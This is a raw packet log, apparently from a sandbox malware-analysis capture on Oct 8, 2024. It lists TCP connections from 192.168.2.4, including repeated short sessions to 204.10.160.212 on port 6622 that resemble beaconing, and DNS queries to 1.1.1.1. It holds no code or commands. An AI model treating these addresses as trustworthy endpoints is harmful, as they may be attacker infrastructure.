                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.865386009 CEST5658680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.870827913 CEST8056586165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:49.870845079 CEST8056586165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.045380116 CEST8056586165.160.13.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.060086012 CEST5658880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.065284014 CEST805658854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.065370083 CEST5658880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.065493107 CEST5658880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.065509081 CEST5658880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.070554018 CEST805658854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.070724010 CEST805658854.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.239243031 CEST5658680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.411180973 CEST5658880192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.414633989 CEST5658980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.420017004 CEST805658954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.420125961 CEST5658980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.420243025 CEST5658980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.420278072 CEST5658980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.426992893 CEST805658954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.427031040 CEST805658954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.918900967 CEST662256587204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.919135094 CEST565876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.919173956 CEST565876622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.924421072 CEST662256587204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.989615917 CEST565906622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.994724035 CEST662256590204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.994968891 CEST565906622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.998553991 CEST565906622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.004017115 CEST662256590204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.146817923 CEST805658954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.147195101 CEST5658980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.147286892 CEST805658954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.147351027 CEST5658980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.152302027 CEST805658954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.165218115 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.165914059 CEST5659180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.170901060 CEST8056575208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.170958042 CEST5657580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.171056986 CEST8056591208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.171130896 CEST5659180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.175370932 CEST5659180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.175370932 CEST5659180192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.180413961 CEST8056591208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.180568933 CEST8056591208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.786031961 CEST662256598204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.796505928 CEST5659980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.801779032 CEST805659918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.801883936 CEST5659980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.802222967 CEST5659980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.802278996 CEST5659980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.807287931 CEST805659918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.807606936 CEST805659918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.291325092 CEST805659918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.293919086 CEST805659918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.294114113 CEST5659980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.299668074 CEST5659980192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.305807114 CEST805659918.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.337445021 CEST5660080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.342873096 CEST805660044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.342952967 CEST5660080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.361182928 CEST5660080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.361210108 CEST5660080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.366638899 CEST805660044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.366699934 CEST805660044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.810765028 CEST805660044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.810940027 CEST805660044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.811002970 CEST5660080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.817358017 CEST5660080192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.822251081 CEST805660044.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:57.240547895 CEST662256598204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:57.240660906 CEST565986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:57.240735054 CEST565986622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:57.245646954 CEST662256598204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:58.255289078 CEST566026622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:58.260392904 CEST662256602204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:58.260468006 CEST566026622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:58.265897036 CEST566026622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:58.270920038 CEST662256602204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:59.745537043 CEST662256602204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:59.745594025 CEST566026622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:59.745656967 CEST566026622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:59.750545025 CEST662256602204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:00.755052090 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:00.760238886 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:00.760314941 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:00.766398907 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:00.771408081 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.008692026 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.009052038 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.009063959 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.009105921 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.009105921 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.009170055 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.009231091 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.245616913 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.245876074 CEST566036622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:03.247766018 CEST662256603204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:04.020723104 CEST566046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:04.026053905 CEST662256604204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:04.026199102 CEST566046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:04.030128002 CEST566046622192.168.2.4204.10.160.212
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.321635008 CEST6318653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:08.329819918 CEST53631861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.487287045 CEST5577453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:14.496702909 CEST53557741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.438119888 CEST6327953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:28.448232889 CEST53632791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.435421944 CEST5472753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:36.443048954 CEST53547271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.134319067 CEST5864353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.555598021 CEST53586431.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.608376980 CEST6547453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:38.616730928 CEST53654741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.956599951 CEST6037353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:39.964734077 CEST53603731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.357985020 CEST5840553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.366291046 CEST53584051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.554475069 CEST6551553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.563415051 CEST53655151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.392577887 CEST6519153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.406192064 CEST53651911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.765997887 CEST5091653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.774672031 CEST53509161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.577131033 CEST4989053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.585037947 CEST53498901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.642941952 CEST6166353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:43.651650906 CEST53616631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.410362005 CEST5264953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.422286987 CEST53526491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.969723940 CEST5197053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.980623007 CEST53519701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.284267902 CEST5132853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.293546915 CEST53513281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.902477026 CEST6209153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.910003901 CEST53620911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.029062033 CEST5512253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.229948044 CEST53551221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.319195032 CEST5193553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.327291965 CEST53519351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:47.887706995 CEST5350953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.075503111 CEST53535091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.192673922 CEST5319353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.200038910 CEST53531931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.917565107 CEST6174853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:48.925452948 CEST53617481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.024544001 CEST5323953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.133580923 CEST53532391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.699821949 CEST5462153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.707488060 CEST53546211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.966543913 CEST5052553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.168936014 CEST53505251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.317666054 CEST5040153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.326406956 CEST53504011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.475619078 CEST5844853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.658698082 CEST53584481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.791481972 CEST5175653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:52.990386009 CEST53517561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.476006985 CEST5022153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:53.484894037 CEST53502211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.802829981 CEST6345553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.906305075 CEST53634551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.097446918 CEST5581853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.281294107 CEST53558181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.759212017 CEST6407253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.767105103 CEST53640721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.058988094 CEST5046053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.066489935 CEST53504601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.692397118 CEST5052853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.699423075 CEST53505281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.177506924 CEST5012853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.186758995 CEST53501281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.228328943 CEST5899853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.235970020 CEST53589981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.239413977 CEST5963753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.246922016 CEST53596371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.911716938 CEST5170053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.921395063 CEST53517001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.611911058 CEST5863253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.711159945 CEST53586321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.766700029 CEST5172853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.775360107 CEST53517281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.470787048 CEST5013253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.478424072 CEST53501321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.982357025 CEST5907953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.990777969 CEST53590791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.830379009 CEST5611753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.839298010 CEST53561171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.889893055 CEST6069453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.898057938 CEST53606941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.233333111 CEST5071053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.240900040 CEST53507101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.415793896 CEST6188953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.423928022 CEST53618891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.714534044 CEST5095553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.726070881 CEST53509551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.240989923 CEST6010653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.248605013 CEST53601061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.518723011 CEST5038553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.527308941 CEST53503851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.742652893 CEST6462553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:24.932609081 CEST53646251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.695209980 CEST4924853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:25.883683920 CEST53492481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.214281082 CEST5320153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:26.221669912 CEST53532011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.146472931 CEST6015553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.154342890 CEST53601551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.834548950 CEST6182053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.841463089 CEST53618201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.846812963 CEST5561953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.854667902 CEST53556191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.511866093 CEST5779753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.520008087 CEST53577971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.003350973 CEST5733053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.011852980 CEST53573301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.049097061 CEST5964753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.057868958 CEST53596471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.588587046 CEST6180453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.685930967 CEST53618041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.478199959 CEST6182353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.487108946 CEST53618231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.127726078 CEST5357153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.145297050 CEST5357153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279155970 CEST53535711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279191017 CEST53535711.1.1.1192.168.2.4
